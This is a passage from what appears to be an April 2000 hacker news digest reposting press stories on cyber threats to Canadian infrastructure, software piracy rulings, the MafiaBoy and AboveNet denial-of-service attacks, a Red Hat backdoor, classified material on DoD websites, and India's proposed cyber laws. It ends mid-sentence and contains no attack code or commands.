Online terrorists, criminals likely to target vital infrastructure systems David Pugliese The Ottawa Citizen His alias is hV2k and he's a hacker who specializes in breaking into military and government computers. HV2k is the Internet name of the person who entered the Department of National Defence's Web page on Nov. 1. Within a period of five days, hV2k -- also known as "slipy" -- broke into 19 military and government computers in Canada and the United States. On his list were the state of Virginia's Sex Offender Registry, the state of New York's tax computer system, the Canadian government's Human Resources Development Department, and four U.S. military computer sites. A joint Canadian Forces National Investigation Service and RCMP investigation determined the identity of two people involved in the hV2k attacks, one of them being a young offender, but no further details are being released. But one thing is certain: The Canadian military expects hackers similar to hV2k to come calling again. "Canada is becoming more and more of a target for hacker-cracker groups as information regarding domestic vulnerabilities becomes known," a Canadian military intelligence report written in November concludes. Expect more intrusions, was the report's basic message. HV2k simply left his name on the military's Web site, but that action required the department to individually check all its pages on the Internet to see whether they had been altered. It's not known what was done to the U.S. sites. But security analysts and government officials are concerned there is potential for much more than Web vandalism, especially when compu-ters are put into the hands of terrorists and criminals. A concentrated attack, they worry, could shut down the key infrastructure computers that run everything from the hydro system to telecommunications. The result could be similar to the damage caused by the massive ice storm that paralysed much of Eastern Canada in 1998. "To me, it's the threat of the future which has to be watched more closely," says Conservative Senator William Kelly, the chairman of the Senate committee on terrorism and public safety. "A cyber-attack is a much cheaper way to interfere with critical infrastructures than it is to drop a nuclear bomb." The other problem Canada faces is its close links with the U.S., both in economic areas and its computer infrastructure. Any attack on the U.S. is bound to cause a ripple effect into Canada. "The U.S. has the highest level of technology, and therefore is the most vulnerable to (information operations) attack by state (or) non-state actors," warns another intelligence report compiled in November. "Canada's connectivity with the U.S. also makes it highly vulnerable to (information operations) attacks." But terrorism expert John Thompson of the Mackenzie Institute in Toronto sees the threat as overblown, at least for now. He says those who are "attacking" government and military systems have been mainly hackers not related to terrorist groups. "No one has seen a terrorist yet who can do anything beyond hacking a Web page up," Mr. Thompson points out. "It's more of a threat in potential than one that has been realized." The main problem for terrorist groups, he argues, is in finding competent hackers. "Where is (Osama) bin Laden going to get his hackers?" asks Mr. Thompson, referring to the alleged terrorist leader who is believed to have ordered bombing attacks against U.S. embassies in Africa. "In Afghanistan? I don't think so." Mr. Kelly acknowledges that many attacks on Canadian computer systems can be classified as more a nuisance than a threat. But he also points out that some of the attacks, while appearing to be minor in nature, are actually probes to test the weaknesses of the systems. That could be a lead-up to more devastating assaults in the future. In other cases, information has been removed or altered. For example, Immigration Canada's computers have been hacked into by someone opera-ting from Asia and certain records were removed. "I consider that highly dangerous," says Mr. Kelly. Specialists in information warfare vary in their estimation of how prepared Canada is for a cyber-attack. Col. Randy Alward, commander of the Canadian Forces Information Operations Group, said the military itself has a secure internal computer system. It also has a specialized team that continually tests the security of its systems. The Armed Forces is also developing a robust information protection capability because it wants to branch out more on the Internet, using it for everything from gathering information on military equipment purchases to booking travel for employees. But to do that it has to make sure that any future Internet connections are secure, so intruders can't use them to slip into the internal computer system. "We believe we are developing an information protection capability that is fairly good," said Col. Alward. "We're quite comfortable with it, but it is developing." Other specialists, such as Prakash Bhartia, director general of Defence Research Establishment Ottawa, where advanced work is being conducted into hacker threats, worry that other federal government and commercial computers are open to attack. "We are pretty vulnerable," acknowledges Mr. Bhartia. So far, he said, Canada has escaped any real dama-ging attack. His concern is borne out by intelligence reports. "The vulnerabilities of Canadian critical infrastructure are increasing and recent trends show more attacks aimed at infrastructures," the November report warns. But Mr. Kelly believes the country is on the right track in preparing for future cyber attacks. He says a lot of progress has been made in both provincial and federal government areas in setting up a system to share information on attacks and determining where the vulnerabilities lie. He believes Canada is ahead of the U.S. in the area of protecting its infrastructure computers and that a national centre to co-ordinate a response to cyber attacks will soon be developed by the government. "One of the problems we've had all along is the relative lack of concern Canadians have always had about their own security," said Mr. Kelly. "But I think people are gradually becoming more aware of what the risks are." Those risks, according to the Canadian military intelligence reports, could come in the form of hackers for hire, both for criminal and terrorist groups. "Many hackers or crackers, including former employees of Eastern Bloc intelligence services, now work on the open market and provide their services to state/non-state actors," one report determined. "Clients include business intelligence firms engaged in industrial espionage as well as criminal organizations intent on outwitting police surveillance or perpetrating electronic frauds." It points out that the Colombian drug cartel, for instance, has set up a communications system that is difficult for police and western intelligence agencies to break into. Other groups are operating for more political motives. One such organization, the Hong Kong Blondes, claims to be based in China and is directed by two individuals by the names of Blondie Wong and Lemon LI. An offshoot of that group has been created and dubbed the Yellow Pages. It has threatened to attack the information infrastructure systems in China and the U.S., with the goal of increasing international awareness of human rights abuses in China. "It seems (the Hong Kong Blondes) was created to demand accountability from western companies that conduct business with (Chinese) organizations who are responsible for the continuing abuses of human rights," one intelligence report noted. The Hong Kong Blondes, it pointed out, are ready to conduct computer attacks on western companies dealing with China. @HWA 99.0 [HNN] Piracy Legal In Italy, Sort of ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by TheHex A judge in Turin has ruled that the copying of commercial software is not a crime as long as it is not done for profit or sold to third parties. The case centered around a Turin businessman who made copies of software for use in his company. The judge ruled that since the business man did not copy the software for profit he is not guilty of a criminal violation. Microsoft said it was disgusted with the ruling. Wired http://www.wired.com/news/politics/0,1283,35827,00.html Italy: Software Piracy OK, Sorta Reuters 8:00 a.m. Apr. 21, 2000 PDT MILAN -- A judge in Turin has ruled that it is not a crime to copy software as long as it is not done for profit and the pirated copies are not sold to third parties, Italian newspapers reported on Friday. Corriere della Sera and other papers reported the case of a Turin businessman who made copies of word-processing, accounting, and design software for use in his company. But even though he saved money by paying only one license fee, the judge ruled that since he had not sold on the copied software to others, he did not act "for profit." Defense lawyer Claudio Morro told Corriere that the ruling was in line with the law, which specifically said that for criminal rather than civil charges to be brought, the motive for copying the software had to be profit. "My client copied the programs not to sell them to others but only to use them within his company. So in his case there is only the saving on spending," Morro was quoted as saying. "There could still be elements for a civil case, but from a criminal point of view the question is resolved." A Microsoft Italia executive told the paper the company was disgusted by the ruling. "It is clearly the fault of a legislative hole, but also of an excessively technical attitude on the part of the judge who passed the sentence. The judge has made a mistake," Maurizio Bendina, director of Microsoft Italia's small business division, was quoted as saying. Copyright © 1999-2000 Reuters Limited. @HWA 100.0 [HNN] Palm VII Considered Security Threat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by William Knowles The Lawrence Livermore National Laboratory has banned the Palm VII from its labs due to its potential as a security threat. Lab officials say that they are complying with DOE directives that prohibit devices that can transmit information over radio waves. Officials are afraid that saboteurs may use the PalmVII to transmit classified information outside the lab perimeter. San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/merc/docs/001887.htm Deceased url @HWA 101.0 [HNN] Navy Intranet National Security Risk? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by William Knowles The American Federation of Government Employees (AFGE) has charged that the Navy's proposed $10 billion, 360,000 seat intranet is threat to national security. AFGE says that the Navy has not thoroughly thought out its plan and that awarding the entire contract to one company places a considerable security risk on the proposed Intranet. The Navy claims that the AFGE simply does not understand the complexity of the situation. Wired http://www.wired.com/news/politics/0,1283,35713,00.html Navy Intranet a Security Threat? by Craig Bicknell 3:00 a.m. Apr. 21, 2000 PDT The U.S. Navy's plan to build the world's biggest Intranet could create a big security threat and a boondoggle to boot, according to the country's largest federal employees union. "We're concerned about national security, because the Navy's not able to answer basic questions about how they will protect national security on (the new Intranet), and we're concerned that they're playing a shell game with money," said Brendan Danaher, policy analyst for the 600,000 member-plus American Federation of Government Employees (AFGE). The union's barrage is the latest attack on the Navy's proposal to build a gargantuan, 360,000-seat Intranet that would unify all of the Navy and Marine Corp's shore-based operations. The Navy plans to award the $10 billion contract for the project to one of four corporate bidders this June -- nine months earlier than originally planned -- reflecting the sea-service's urgency to reap the benefits of modern info-tech. Last month, the United States General Accounting Office testified before Congress that the Navy had rushed the proposal to corporate bidders without properly analyzing how it would be funded and managed, and what effect it would have on military and civilian information technology workers. Since then, embattled Navy representatives have appeared before Congress 53 times to defend their plan. "There's been absolutely no one who questions the need, value, or concept of this Intranet," Navy deputy CIO Ron Turner said. "They just don't understand the math we've put into this." But there's more than a math problem, insists AFGE's Danaher. The Navy's plan to contract out the installation, service, and oversight of the Intranet to a single private company poses an unacceptable national security risk, he said. "We're concerned that private companies will put their interest before national security," Danaher said. "What if that company's ownership changes, or its stock price plummets. Who knows what could happen?" That argument lacks a certain sophistication, according to Turner. "It's a comment made without looking at how we currently operate. The government would like you to believe that we control the networks, but we ride on commercial fiber that someone else operates," he said. Moreover, the Navy currently operates 100-plus separate networks, all with different firewalls and security, all of which have to interconnect. That means 100 points of vulnerability, according to Turner. With a unified Intranet, the Navy can deploy one security system and screw it down tight. Security will be improved, not degraded, he insists. There's no budget problem either, Turner said. Funds for the Intranet will come from money already allocated for IT projects, not from the operational coffers that pay for ships to sail and planes to fly, as critics in Congress have charged. Turner attributes the AFGE's attack largely to a self-serving desire to protect union IT jobs that might be threatened by the new Intranet. Some 1,000 civilian IT employees could be displaced by the Intranet, he said, but the Navy will take pains to place them in new positions. Danaher counters that it's not the threat of job losses that concerns the AFGE so much as the Navy's inability to say exactly what jobs might be lost where, and what that says about the broader project. "We don't know, the Navy doesn't know, nobody knows, and that's a symptom of a larger problem," Danaher said. "Our members are people that work for the military and the federal government, and they're concerned about national security and efficiency," he said. "When you look at the history, you see that the Navy is anything but trustworthy when it comes to contract oversight. We're not saying this is a horrible idea, but the way they're going about this is pretty dangerous." The government's accounting office and a number of congressmen share those concerns. "Look, we're not trying to pull the wool over people's eyes," said a weary Turner, who expects to appear before Congress several times in the coming weeks to further detail the Navy's proposal. Meanwhile, barring any direct orders to the contrary, the project will continue full-speed ahead. "Nobody's told us to stop or slow down," Turner said. @HWA 102.0 [HNN] Mitnick Upset Over Claims Made by UITA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by Mitnick_Media In a press release linked to by HNN last Thursday the Utah Information Technology Group made several claims that Kevin Mitnick feels are in error. In an effort to set the record straight we provide both sides of the story. HNN Archive for April 2, 2000 Desert News Mitnick Rebuttal http://www.hackernews.com/arch.html?042000#2 http://deseretnews.com/dn/view/0,1249,160008642,00.html? Already printed elsewhere this issue - Ed @HWA 103.0 [HNN] Holiday Message from Disney Leaked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by Macki 2600 magazine was recently furnished with a copy of an email sent from Walt Disney CEO, Michael Eisner, to a vast number of Disney employees about DVD piracy. 2600 http://www.2600.com/news/2000/0423.html A HOLIDAY MESSAGE FROM DISNEY CHIEF 04/23/00 2600 was recently furnished with a copy of an email sent from Walt Disney CEO, Michael Eisner, to a vast number of Disney employees. While 2600 is not mentioned by name, the letter clearly focuses on the issues raised by the lawsuit Disney (and other MPAA members) have filed against us for publishing DeCSS on our website. In one paragraph towards the end of the letter Eisner actually makes our case for us and admits that either DVDs are too expensive and people pirate them, or they are affordable (which they are) and people don't pirate them (which they don't). Our comments are in bold. Dear Fellow Cast Members: In several past e-mails, I have written you about the tremendous opportunities represented by the Internet. Today, I offer a caveat. While the Internet continues to be present great potential to our company, we first must fully address the issue of piracy. For some reason piracy has been on my mind. Maybe this is because I keep reading about the seriousness of it, or maybe it is because I know a digital copy of a film is a perfect copy. Or maybe it is because I know that the Internet is a worldwide delivery system honoring no borders. Or maybe it is because I just needed something to speak about at the Variety/Schroeder's entertainment industry conference in New York City 10 days ago. Probably it is a little of all the above. [A digital copy transferred over the Internet is likely to be compressed and far poorer quality than an analog copy.] By "piracy," I'm not talking about the comical characters sailing the high seas at the Pirates of the Caribbean. Rather, I'm talking about an underground of secretive and sequestered pirates of encryption - the hackers who shamelessly assert that anything they can get their hands on is legally theirs. These Internet pirates try to hide behind some contrived New Age arguments of the Internet, but all they are really doing is trying to make a case for Age Old thievery. [Wow that's pretty twisted. "pirates of encryption", who the hell are they? How does one pirate encryption? More so, what does that possibly have to do with people stealing? On top of all that, now 'hackers' is supposed to be synonymous with 'shameless thieving pirates of encryption'? Someone here is shameless, and it ain't us. "When they hack a DVD and then distribute it on the web", yet another jump is made from breaking encryption to PLAY DVDs to distributing it on the web. Funny how they haven't accused ANYONE of doing this. Nor would it make any sense for someone to "hack a DVD" before ripping it as a VCD - since VCDs are usually lower resolution than television.] When they hack a DVD and then distribute it on the web, it is no different than if someone puts a quarter in a newspaper machine and then takes out all the papers, which, of course, would be illegal and morally wrong. The pirates will argue that this analogy is unfair, maintaining that all they're doing is cracking a digital code. But, by that standard, it would be justifiable to crack a bank code and transfer the funds from someone else's account into your own. There's just no way around it - theft is theft, whether it is enabled by a handgun or a computer keyboard. [Of course pirates will argue that analogy is unfair - so would anyone with any modicum of critical thinking skills. While we could argue the difference between intellectual property and tangibles like a newspaper, this analogy is irrelevant because no piracy is actually taking place. Normally we wouldn't even feel the need to respond to this, but since he goes on to imply that WE are the "pirates" it seems like a good idea. Eisner speculates that people will maintain that all that was done was the "breaking of the digital code" - he's right. Note that breaking CSS does not involve any stealing or piracy. So then it does not logically follow that by breaking the code someone is also necessarily using it to steal. After all, CSS prevents DVDs from being PLAYED not COPIED, so cracking it is in no way an indication of impending theft.] Of course, piracy has been around a long time. Many of you probably remember a very funny "Seinfeld" episode (I suppose that's redundant - they all were funny, except maybe for the last one) in which Jerry becomes an "auteur" at making illegal copies of movies by videotaping them off the screen at the local multiplex. But, piracy is anything but funny ... especially now that, instead of making one bad quality videotape for sale on the street, these digital pirates could soon be making unlimited numbers of high quality copies available on the Internet. One of the fallacies of the piracy debate is that it's really just a conflict of the pro-technology members of the "New Media" against the anti-technology members of the "Old Media." This characterization couldn't be more wrong. At Disney we embrace technology. And we always have. Throughout his career, Walt Disney recognized new technology as the friend of the storyteller. And, at Disney today, we are not only seizing the tremendous possibilities offered by technology in movies, as with "Dinosaur" and "Toy Story," but we are also active participants in the expansion of the Internet with our GO.com family of sites. We intend to continue to devote resources to the Internet ... but not if this requires surrendering the rights to things we own. With this in mind, our company is undertaking a wide-ranging strategy to make the Internet truly safe for intellectual property. This strategy consists of five main elements. First of all, we are turning to our representatives in Washington. Intellectual property rights are really no different from ordinary property rights. If you own something, you expect the government to respect your right to keep it from being stolen. [Ah good, since legislating security away worked so well the first time!] Secondly, we are working with governments around the world to respect our rights. We are actively involved in the Global Business Dialogue on Electronic Commerce, and our company is serving as chair of the Intellectual Property Work Group. The third element is education. Working with The Motion Picture Association of America, we are advocating a more aggressive campaign to make people aware of intellectual property rights on the Internet. Most people are honest and want to do the right thing. But they can't do the right thing if they don't know that they're doing a wrong thing. [Perhaps they should consider gaining a tighter grasp on reality themselves, before being so presumptuous as to educate others on the Internet.] Fourth, we believe that the entertainment industry as a whole should take meaningful technological measures. Working in cooperation with technology companies, we need to develop innovative and flexible encryption devices that can stay one step ahead of the hackers. [How about just doing it right the first time? Or better yet, stop infringing on the Fair Use Doctrine, so that people won't NEED to break the encryption!] Our fifth initiative is economic. History has shown that one of the best deterrents to pirated product is providing legitimate product at appropriate prices. In the music industry, we have already seen that people will gladly pay fair prices for legally-produced product even when it can be easily reproduced and unlawful copies can be easily acquired. [This is the best paragraph in the whole damn thing. Michael Eisner is actually admitting that either DVD prices are too high (like in the UK) or that piracy is not a problem because people will buy DVDs anyway - just like they do CDs. He is absolutely correct, we have been saying this all along. It is cheaper to BUY a DVD than it is to pirate it, and you get a nice clean copy complete with goodies. Finally, the truth comes out: PIRACY IS NOT THE ISSUE! Being able to PLAY legally purchased DVDs in the player and country of your choice are the issues! We're so glad Michael Eisner has finally admitted this - maybe now Disney will drop the lawsuit.] With every passing day, I believe we are getting closer to a time when the Internet will become another important revenue stream for the studios. This is what happened with Pay TV in the '70s and with Home Video in the '80s. If we act appropriately and aggressively in combating the pirates, then this could be the dawn of a new era of opportunity for companies that consistently create great entertainment ... and there's one in particular that comes to mind. So that's what has been on my mind the last couple of weeks, that as well as the strong showing of our company, especially at our parks and TV networks. Life is good. Have a nice Easter/Passover Weekend. [Lashanah haba'ah b'Federal Court, Mikey] Michael @HWA 104.0 [HNN] Attrition Updates Mailing List ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 24th contributed by McIntyre Attrition.org has modified their mailing list section to let readers know that even though the main mirror isn't updated on a continual basis, their automated mirror script e-mails the "defaced" lists by default immediately after each mirror is taken along with a URL for the mirror's location. Readers interested in more "instant notification" should sign up today. Attrition.org http://www.attrition.org/security/lists.html @HWA 105.0 [HNN] MafiaBoy's Friends Under Investigation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 25th contributed by Evil Wench Authorities have identified three friends of MafiaBoy who are also suspects in the recent DDoS attacks. Authorities are also investigating a small group thought to be based in Isreal who have been involved in various online financial crimes in the past. They said they are also still looking at Coolio (Dennis Moran) as a possible suspect. USA Today http://www.usatoday.com/life/cyber/tech/cth767.htm 06/07/00- Updated 07:49 PM ET Hacker's friends may be suspects, too By Kevin Johnson, USA TODAY WASHINGTON - Authorities investigating the February attacks on some of the most popular Internet sites are focusing on three close friends of the 15-year-old Canadian boy who was charged earlier this week, a senior U.S. law enforcement official said Thursday. The three friends of the Montreal computer hacker known as "Mafiaboy" are among several potential suspects identified by authorities in the cyberassaults that temporarily shut down the Web sites of CNN, Yahoo!, Amazon.com and several other media and commercial giants. Beyond Montreal, authorities are examining the activities of a small group of hackers thought to be based in Israel. Officials there say the group has been involved in various online financial crimes, some involving stolen credit card numbers. The group is believed to be part of a larger circle of computer users, including Mafiaboy, who have spent time in an Internet chat room called TNT. The chat room is accessible only by password. Investigators also are trying to determine whether Dennis Moran, a 17-year-old New Hampshire hacker known online as "Coolio," was involved in the attacks in February. Moran, who authorities say has boasted of being involved in the attacks, was charged last month in an attack on a Web site run by the Los Angeles Police Department. The unidentified Montreal teenager known as Mafiaboy has been charged only in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8 after it was overloaded with requests. Mafiaboy claimed credit in chat rooms for similar assaults on sites run by Yahoo! and Buy.com. Officials believe Mafiaboy may have been capable of directing all the assaults but doubt that he did. Analysts familiar with the assaults say the software used to wall off access to the CNN Web site on Feb. 8 was different and less sophisticated than that used to paralyze Yahoo! on Feb. 7. Michael Lyle, who runs a software security firm in Palo Alto, Calif., said the attack on CNN involved software commonly found on Internet sites for hackers. "I literally could show you how to do it in three or four hours," he said. The goal is to flood Internet sites with tens of thousands of requests, disguising the source of the assault by routing the requests through high-capacity computers elsewhere. The tactic overloads the targeted Web sites, causing electronic paralysis. Investigators say Mafiaboy orchestrated the attack on CNN.com through computers at the University of California-Santa Barbara. A Canadian law enforcement official said that because of Mafiaboy's age, it is unlikely he would be sent to an adult prison if convicted of "mischief to data." If prosecuted and convicted as an adult, the teenager could face up to 20 years in prison. But in Canada's juvenile system, he faces a maximum of two years in a youth detention center if convicted. Contributing: Deborah Solomon @HWA 106.0 [HNN] Backdoor Found in Redhat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 25th contributed by Mr. Big23 Earlier this month Internet Security Systems found a backdoor in RedHat Linux, the problem has been labeled a 'flaw' by RedHat. The company has been contacted and a fixed has been issued. RedHat recommends that all users of the most recent distribution who have installed Piranha download and install this patch. MSNBC RedHat Updates http://www.msnbc.com/news/399125.asp?0m @HWA 107.0 [HNN] USC Stands Their Ground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 25th contributed by TheHex The University of Southern California (USC) has reportedly refused to join other universities in blocking MP3 music downloads via Napster. The university made the announcement on Friday in response to a lawsuit filed by Metallica, which named USC, Yale University and Indiana University as defendants in charges alleging the schools allowed students to pirate copyrighted music. The lawsuit has caused both Yale and Indiana U. to implement filters on their networks to prevent Napster use. (Go Trojans!) NewsBytes Indiana University - Just look at the Spin http://www.technews.com/pubNews/00/147722.html http://www.iuinfo.indiana.edu/ocm/releases/napster02.html IU installs filters preventing use of MP3 music site April 20, 2000 BLOOMINGTON, Ind. -- Indiana University announced today that it will block all IU network traffic related to a popular MP3 music Web site called Napster.com. "In the rapidly evolving technology related to the Internet, copyright issues in cyberspace remain unclear," said Christopher Simpson, IU vice president for public affairs and government relations. "We believe Indiana University has no liability by allowing access to sites such as Napster. We now believe, however, that our faculty, staff and students could incur legal exposure if they use this technology. Until those unresolved legal issues are clarified, it seems prudent to block the site." Heavy metal band Metallica, E/M Ventures and Creeping Death Music filed a lawsuit last week against Napster, IU and two other colleges contending copyright infringement. While IU does not believe it has any liability to the plaintiffs, the lawsuit prompted a closer look at access issues. "This issue has received a significant amount of attention in recent days," Simpson said. "It has caused us to focus on the fact that technology has leaped well ahead of clear legal issues. University policy prohibits violation of copyright laws, and we believe strongly in protecting intellectual property. Those are fundamental tenets that we will not abandon." Simpson said he hopes a long-term solution can be found to ensure individuals can have access to digital music while protecting intellectual property rights. (Christopher Simpson, 812-855-0850, csimpson@indiana.edu) @HWA 108.0 [HNN] Critics Chide COPPA - Disney Plan Criticized ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 25th contributed by root66 The Children's Online Privacy Protection Act (COPPA) is being criticized by web site administrators as being to costly to implement and for encouraging kids to lie about their ages. Disney has said it plans to ask for parents credit card numbers when verifying parental consent. Mastercard has issued a statement saying that credit cards are not meant to be used for age verification. Disney has said they will go ahead with their plan. Computer World Children's Online Privacy Protection Act (COPPA) http://www.computerworld.com/home/print.nsf/all/000424D89E http://www.ftc.gov/ogc/coppa1.htm @HWA 109.0 [HNN] Happy CIH Virus Day ~~~~~~~~~~~~~~~~~~~~~~~~~ April 25th contributed by Bjornar Last year the CIH virus struck rather hard around the world (or was it just the media hype?). April 26th will be here tomorrow, do you have the latest virus definitions installed? CIH or Chernobyl will attempt to overwrite sectors on the hard drive and also attempt overwrite BIOS on flash-capable systems. NAI Virus Description http://vil.nai.com/villib/dispVirus.asp?virus_k Dead url @HWA 110.0 [HNN] AboveNet Hit with DDoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by Evil Wench AboveNet Communications has said that it received what it called a 'direct attack' on its infrastructure. Traffic at AboveNet was brought to a standstill for four hours late Tuesday morning. AboveNet has referred the matter to the FBI but says that tracking the attacker should be easier than previous attacks. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2555422,00.html FBI investigating new Web attack ISP AboveNet hit by a denial-of-service attack -- blocking customers' Web access for hours. 'It was a direct attack on our infrastructure.' By Robert Lemos, ZDNet News UPDATED April 26, 2000 8:18 AM PT Top-five Internet service provider AboveNet Communications suffered a denial-of-service attack on Tuesday -- raising the specter of another round of Web attacks. Paul Vixie, senior vice president of Internet services for Metromedia Fiber Network Inc., AboveNet's parent company, said the attack did not resemble February's spate of DoS attacks. "This was not just a SMURF attack or some other broadcast storm aiming meaningless data at our routers," Vixie said. "It was a direct attack on our infrastructure." The attack stopped Internet traffic to AboveNet's customers for several hours starting late Tuesday morning. The White Plains, N.Y., company is working with the FBI to investigate the attack and declined to give more-specific details. Vixie did say that tracking the attacker should not be as difficult as February's DoS attacks had been. "Technically, there is cause for hope, where in the (denial of service) case their was no cause for hope," he said. Last week, a 15-year-old Canadian boy who called himself "Mafiaboy" online was arrested by the Royal Canadian Mounted Police and charged in connection with the denial-of-service attack on CNN's online site in February. The teen, whose name was not released due to his age, was arrested April 15 and formally charged two days later with two counts of mischief to data after police searched his home. No suspects have been named in the attacks on at least seven other sites, however. AboveNet attack more skilled This attacker seemed a bit more skilled than the cybervandals who flooded eight major Web sites in February, Vixie said. "I would bet that this was someone with a little more experience than the last batch." AboveNet provides Internet service of and hosts the Web sites of nearly 1,000 companies, with offices in the United Kingdom, Germany, the Netherlands and Japan. Vixie said Tuesday's attack could not succeed again. "We plugged the hole that has allowed it to happen," he said. @HWA 111.0 [HNN] Thailand Has No Software Industry Due To Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by root The Business Software Alliance has blamed Thailand's 82% piracy rate with preventing the development of a local software industry. The Thai Software Industry Association said that it expects 30% growth in the local software industry to 7 billion baht ($447.4 million) in 2000 despite the piracy rate. Reuters http://dailynews.yahoo.com/h/nm/20000425/tc/thailand_piracy_1.html Dead Url (Yahoo blows for this) - Ed @HWA 112.0 [HNN] War Plans Found on Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by Evil Wench The Web Risk Assessment Team, a reserve component unit designed to score public web sites for classified information has found quite a lot. 1,300 'discrepancies' where found on over 800 DOD web sites including highly classified information. Pentagon war plans where also discovered on at least ten separate occasions. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0424/web-jtfcnd-04-26-00.asp DOD Web-watchers find war plans online BY Dan Verton RELATED STORIES "DOD pushing forward on Internet disconnect" [FCW.com, April 26, 2000] "DOD boosts IT security role" [Federal Computer Week, Oct. 4, 1999] 04/26/2000 A new reserve unit that monitors the Defense Department’s presence on the World Wide Web has found an astonishing amount of classified or sensitive material on public sites. The Web Risk Assessment Team, established by the Joint Task Force for Computer Network Defense, is made up of reservists who spend one weekend each month scanning DOD Web sites, according to Air Force Maj. Gen. John Campbell, commander of JTF-CND. A survey of 800 major DOD sites on the Internet recently revealed as many as 1,300 "discrepancies," some of them involving highly classified information, Campbell said. The team uncovered more than 10 instances where information on Pentagon war plans was posted. Also among the discoveries has been information on computer system vulnerabilities and more than 20 detailed maps of DOD facilities. Some of the maps and photographs included detailed plans of a facility known as "Site R," which serves as the alternate Joint Communications Center for U.S. nuclear forces, according to Campbell. The overhead photo of "Site R" showed the location of underground tunnel entryways and a detailed floor plan of the facility. Likewise, the Web site for an annual exercise known as "Cobra Gold" included an entire list of participating units, communications frequencies and call signs for aircraft and data on Identification Friend or Foe squawks, which are signals used by pilots to determine if a plane is friendly or enemy. In another instance, the team found a classified excerpt in a policy document on counterterrorism. @HWA 113.0 [HNN] India May get New Cyber Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th contributed by root66 A federal information technology bill has been proposed in India and is set to be voted on next month. The proposed law will create a Cyber-Regulations Advisory Committee, a controller, and adjudicating officers to regulate cyber laws. There will also be a Cyber-Regulations Appellate Tribunal. http://www.wired.com/news/culture/0,1284,35822,00.html India Eyes Cyberlaws by Frederick Noronha 3:00 a.m. Apr. 25, 2000 PDT BANGALORE, India –- With estimates that nearly 2 million Indian citizens will be online by 2001, the world's second-most populous country is looking at ways to regulate cyberspace. India is proposing a federal information technology bill to be voted on next month. One of India's premier law schools, based here, has plans to set up a national institute for cyber-legal studies and research. The institute plans to research the problem of shifting business and trade to the cyber-media, and blending national and international standards. It is looking to sell the project to top Indian info-tech firms like Infosys and Wipro through collaboration with policy planners in the Indian government. "We have made our blueprint, and plan to shortly approach friends in the info-tech sector," said Dr. Nripen L. Mitra, director of the National Law School of India University. Bangalore, known as India's Silicon Valley, is a booming center for software and dot-com companies. By the late 1990s, the city's software exports comprised nearly 57 percent of India's total exports. The city has an estimated 230 info-tech companies, employing nearly 25,000 professionals. Mitra said rapid growth is in need of swift responses. "Law behaves like a traditional Hindu wife, staying seven steps behind the husband," he said. The new high-tech economy also means Indian businessmen have to shift to the paperless world after adapting to doing business in a very bureaucratic country. "Until recently, there were no cyberlaws in India," said Na Vijayashankar, the author of a new book that explains the new laws that may take shape to control, regulate, and harness cyberspace for Indian e-commerce. The federal government recently brought forward the Information Technology Bill. Under the proposed law, which is expected to be tabled in New Delhi's Parliament in May, India will have a Cyber-Regulations Advisory Committee, a controller, and adjudicating officers to regulate cyberlaws. There will also be a Cyber-Regulations Appellate Tribunal. The proposed law defines what constitutes a cybercrime, and also has provisions to punish cyber-criminals. It sets up a framework for transactions involving computer-generated documents and communication. It also deems electronic documents as legally binding and acceptable in place of paper. Checks and bills, powers of attorney, trusts, wills, and contracts of sale of immovable property, however, will not be accepted in a digital format. Computer crimes recognized under the proposed law would affect hackers, and those who are not authorized to enter a system to download data, introduce viruses, damage data or the system, block access to authorized users, or even assist another person in contravening the law. Publishing electronic information that is considered obscene, tampering with computer source documents, breaching confidentiality, publishing false digital certificates, and failing to furnish information or tax returns also would be a violation of the law. If passed, the law would apply to anyone in or outside of India who tampers with a computer located in India. Contrary to other Indian laws, such as the Code of Criminal Procedure of 1973, additional powers have been given to the police to tackle cybercrime. Any senior police officer can enter and search any public place on suspicion without a warrant. Those guilty of securing access to the system without authorization could be fined up to 1 million rupees. Payment of damages would be made to the person affected. There are critics, of course. Some say the software sector has flourished in India precisely because of a lack of regulation. So while the framework for accepting electronic documents is welcome, businessmen say the government should stay out of trying to regulate much of the rest. Senior Indian government officials, however, point to some shocking cases, arguing that there's a need to regulate the cyberjungle. They cite cases where a popular Hindi film actress was depicted nude on the Internet using altered graphics. They also point to prominent cases of cybersquatting, where some small firms allegedly tried to snatch the trade names of huge newspapers. "We had no remedies in such cases. Night and day, hackers are taking on portals, too," said Gulshan Rai, the Ministry of Information Technology's senior director. Some Indian sites have also been the victims of hacking,­ especially after last year's federally-sanctioned nuclear tests in Rajasthan, near the Indo-Pakistan border. Rai said the IT bill would take care of issues of "authentication, origination, jurisdiction and attribution." In some cases of criminalized cyber-behavior, the liability would be civil. But repeated and more severe cases would be treated as criminal liability, Rai said. E-commerce transactions are leading to ludicrous situations in taxation, said India's IT task force member Montek S. Ahluwalia. Music sold internationally on cassette tapes is being taxed, but the same music sold in digital format is not; services sold over the Net internationally are not taxed, while those sold within the country are, Ahluwalia said. Rai said the cyber-surveillance and interceptions provisions of the new IT bill would require those offering over 2MB of bandwidth to give access to traffic to agencies like the Intelligence Bureau and Central Bureau of Investigation. There are other laws already in place relating to cybercrimes. "Just because you're on the Internet doesn't put you above national laws. Pornography and gambling is prohibited under the Indian Penal Code of 